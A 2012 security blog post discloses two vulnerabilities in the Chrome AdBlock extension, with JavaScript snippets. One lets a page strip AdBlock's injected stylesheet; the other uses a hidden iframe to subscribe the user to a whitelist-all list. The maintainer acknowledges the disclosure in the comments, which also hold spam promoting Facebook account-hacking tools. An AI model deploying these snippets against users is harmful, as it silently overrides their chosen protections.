Tuesday, March 27, 2012

Chrome addons hacking: Bye Bye AdBlock filters!

Continuing the Chrome extension hacking (see part 1 and 2), this time I'd like to draw you attention to the oh-so-popular AdBlock extension. It has over a million users, is being actively maintained and is a piece of a great software (heck, even I use it!). However - due to how Chrome extensions work in general it is still relatively easy to bypass it and display some ads. Let me describe two distinct vulnerabilities I've discovered. They are both exploitable in the newest 2.5.22 version.

tl;dr: Chrome AdBlock 2.5.22 bypasses, demo here and here, but I'd advise you to read on.


If you want to analyze the extension code yourself, use my download script to fetch the addon from Chrome Web Store and read on:
// you need PHP with openssl extension and command line unzip for this
$ mkdir addons
$ php download.php gighmmpiobklfepjocnamgkkbiglidom AdBlock
Of course, you don't need to, but if you won't it makes me sad :/

Small bypass - disabling filter injection

Like many Chrome extensions, AdBlock alters the content of the webpages you see by modifying a page DOM. For example, it injects a  <link rel=stylesheet> that hides all ads with CSS. This all happens in adblock_start_common.js:
function block_list_via_css(selectors) {
  var d = document.head || document.documentElement;
  // Issue 6480: inserting a <style> tag too quickly made it be ignored.
  // Use ABP's approach: a <link> tag that we can check for .sheet.
  var css_chunk = document.createElement("link");
  css_chunk.type = "text/css";
  css_chunk.rel = "stylesheet";
  css_chunk.href = "data:text/css,";
  d.insertBefore(css_chunk, null);
// ... and fill the node contents later on
Sweet & cool, right? But the problem is websites have tons of ways to defend themselves from being altered. After all, it's their DOM you're messing with. So, the easiest bypass would be to listen for anyone adding a stylesheet and removing it.
function block(node) {
    if (   (node.nodeName == 'LINK' && node.href == 'data:text/css,') // new style
        || (node.nodeName == 'STYLE' && node.innerText.match(/^\/\*This block of style rules is inserted by AdBlock/)) // old style
        ) {

document.addEventListener("DOMContentLoaded", function() {
    document.addEventListener('DOMNodeInserted', function(e) {
    // disable blocking styles inserted by AdBlock
    }, false);
}, false);
In the effect the stylesheet is removed and the ads are not hidden anymore. See in the demo. This is similar to how many Chrome extensions work. Extension authors should remember that you can't rely on page DOM to be cool with you, it can actively prevent modification. In other words, it's not your backyard, behave.

Total bypass - Disable AdBlock for good

The previous one was a kid's play, but the real deal is here. Any website can detect if you're using Chrome AdBlock and disable it completely for the future. It is possible thanks to a vulnerability in a filter subscription page. Subscription code works by launching chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages/subscribe.html page. Here's what happens:
// pages/subscribe.js
  //Get the URL
  var queryparts = parseUri.parseSearch(document.location.search);
  //Subscribe to a list
  var requiresList = queryparts.requiresLocation ?
      "url:" + queryparts.requiresLocation : undefined;
      {id: 'url:' + queryparts.location, requires:requiresList});

First, the query string for the page is parsed and than a subscription request is sent to extension background page getting the location parameter. So, when extension launches subscribe.html?location=http://example.com this will subscribe to a filter from URL http://example.com.

All neat, but what extension authors don't know, standard web pages page can load your extension resources too. In the future, extension authors can limit this by using web_accessible_resources, but for Current Chrome 17 it's not possible.

So, what is the easiest way to disable Chrome AdBlock? Make it subscribe to a whitelist-all list:
<iframe style="position:absolute;left:-1000px;" id="abp" src=""></iframe>
document.getElementById('abp').src = 'chrome-extension://'+addon_id + '/pages/subscribe.html?location=' + location.href.replace('disable.html', 'list.txt');
See for yourself in the demo.
To reenable AdBlock functionality go to extension settings, choose the filter list  tab and disable the last added filter (koto.github.com one).

How to fix this in the code? Don't rely on the URL of your extension resource to perform some action.


r9s said...

Nice job.

pogue972 said...

Have you let the author of Adblock know about the sploits?  I don't know coding, so my questions may be stupid.  But, is this more of a Chrome problem, an extension problem (in general), or more like a advertiser cat vs mouse type of thing?

Btw, there is an extension (you may or may not be aware of/interested in) for Chrome thats kind of supposed to work like NoScript for Firefox called NoScript, but its really really in early development and kind of breaks everything. https://code.google.com/p/scriptno/

Zzii said...

and firefox's adblock is not exploitable because it uses browser level filters ,something chrome doesnt let you do

RJ said...

Great article!

michalstanko said...

Thanks for the article, it's very interesting.

Anyway, the best adblock you can have is turning plug-ins (Flash) off, which is supereasy in Opera, easy in Chrome, and possible in Firefox with Flashblock (there might be easier way I don't know about). And then whitelist sites like Gmail, YouTube, Google Maps or Dropbox, which use Flash for something useful.

Wladimir Palant said...

Nice vulnerability you found there. Just a note: Adblock Plus for Chrome is not affected, only Adblock. As to CSS tricks - yes, that's a Chrome limitation and not something that extension authors can currently fix (Adblock Plus for Firefox is fine).

kkotowicz said...

Yup, we have to wait for webRequest ( http://code.google.com/chrome/extensions/trunk/webRequest.html ) until real ad blocking is supported, so I consider the first vulnerability just a sweet, interesting trick. But you should fix the second one nonetheless ;)

kkotowicz said...

Sorry, I confused the extensions - so many AdBlocks to choose from ;) I've already contacted Michael about the issues. 

Wladimir Palant said...

 Yes, it is confusing. Wasn't my idea to name a competing extension "Adblock".

Anyway, I think that Adblock Plus is completely waterproof now. Web pages can no longer mess with extension pages, not even theoretically.

Michael Gundlach said...

Thanks for the heads up, Krzysztof.  The next release of AdBlock will fix the second vulnerability.  As Wladimir mentioned, the first only prevents hiding rules from working, though blocking will still work.

James Edward Lewis said...

It's ScriptNo, and once you start Trusting a few sites it doesn't seem to break anything anymore; in this respect it is like NoScript's default setup. Also it's fairly mature by now, having switched over to using the ContentSettings and WebRequest APIs available with Chrome 17.

It doesn't, however, have some of the more advanced functionality of NoScript, like surrogate scripts, the XSS filter, or the Application Boundaries Enforcer, and it also doesn't block plugins (but the click-to-play flag is available for that, and Chrome blocks most plugins by default anyway) or frames (but Better Popup Blocker works well for that).

EliSklar said...

"After all, it's their DOM your messing with"
I'm not usually a grammar nazi, but this "your" just makes me cringe.

kkotowicz said...

Agrh, fixed, thanks!

Marshal Walker said...

Thanks for telling all the spammers 

Anonim said...

Doesn't work on AdBlock Plus ;D

song jia said...

Valuable information and excellent design you got here! I would like to thank you for sharing your thoughts and time into the stuff you post!! Thumbs up.  www.cheapbeatsearphones.com/


I don't want sex ads on my wall on pinterest and ad block was working perfectly, now it's not and they are back. I want them off. I'm my pinterest account and I have thousands of followers. I dont' really want to see dirty derik cums for you on my wall!  I'm pretty pissed.  How do I get it off my walls. Disgusted! 

Noreply said...

"After all, it's their DOM you're messing with"

on their server it is.  In my cache it is MINE to alter as I please for my selective viewing

HumminGly said...

1loopback proxy adblocking is not affected.  AdBlock (Plus) ought offer this model as an alternative.  xulrunner?

[at] kotowicz : ScriptNo (chromium)

HumminGly said...

" a advertiser cat vs mouse type of thing?"

Guess who always wins?

(hint: not the ad servers)

Billy belend said...


Escort Manchester said...

If I could say one thing about this blog it would be
design! I mean, I was so distracted by the clashing colours that it was pointless to try to read the blog. What are trying to do here exactly? No one can read this is if it looks like a kid smashed a box of Crayola on your page! Please do something about this.http://www.escortchaps.co.uk/

Hack Facebook said...

I'm excited to discover this web site. I wanted to thank you for your time due to this wonderful read!! I definitely appreciated every part of it and I have you book-marked to see new things in your web site. Ever wanted to hack your friends or foes facebook account? Worry not, we have the simplest and easiest tool to hack any facebook profile or account for free. Just visit www.hackfbaccount.net and start hacking.

Hack Facebook said...

Good post. I learn something new and challenging on sites I stumbleupon everyday. It's always useful to read through content from other writers and practice a little something from other websites. Ever wanted to hack your friends or foes facebook account? Just visit www.hackfbaccounts.org and hack anyboy today. No strings attached. It takes just 2 minutes to hack any facebook account.

Malik Gupta said...

Hack Facebook

Assburger said...

I am using adblock on this blog, eat shit

Lewis N. Clark said...

A community for technical news and discussion of
information security and closely related topics. Posting Guidelines.
Always link to the original ...

coaster ville facebook

Vinayak Sutar-Patil said...

Nice stuff indeed! You have provided very good information in details.

Cricket news of India said...

Newsgaadibrings up to date
information on health and medicine, earth and climate, space and energy and
latest inventions in technology which makes you feel astonishing. The zeal
towards knowing the unknown is what that makes you read our news on science and
Breaking news in world

International breaking news today

Latest business headlines

entertainment news

sports news

sports news

news football

bollywood entertainment news

Latest bollywood news

Business technology news

Cricket news of India said...

Watch out live updates on cricket,
football, hockey, tennis, F1 and many othersInterviews and breaking news of
celebrities, get up to date information on sports in newsgaadi.

Current science and technology news

science technology news

Today latest news in

National news headlines

news football

Live cricket news India

cricket news India

Latest news in Hyderabad | India

Latest tollywood news

sizegenetics discount said...

Sorry for the significant assessment, but I'm honestly loving the new Zune, and hope this, together with the wonderful evaluations some other persons have written, will assist you to make a decision if it is the right choice for you.sizegenetics discount

sizegenetics discount said...

Let me start off by saying nice post. Im not certain if it has been talked about, but when utilizing Chrome I can never get the whole site to load without refreshing numerous times. Could just be my computer system. Thanks.stellar phoenix photo recovery

sizegenetics discount said...

I'm typically to blogging and i genuinely appreciate your posts. The article has truly peaks my interest. I am going to bookmark your website and maintain checking picking particulars.wondershare dr fone

Nico said...

Does this still work?

Mona Ali said...

تنظيف فلل بالرياض

شركه عزل خزانات بالمدينه المنوره

شركة تنظيف بالقطيف

شركة تنظيف بيارات بالأحساء





Clipping Path Service said...

A great way of making me feel like what you have to say is just as important to me as it is to you. Keep it up!
Clipping Path service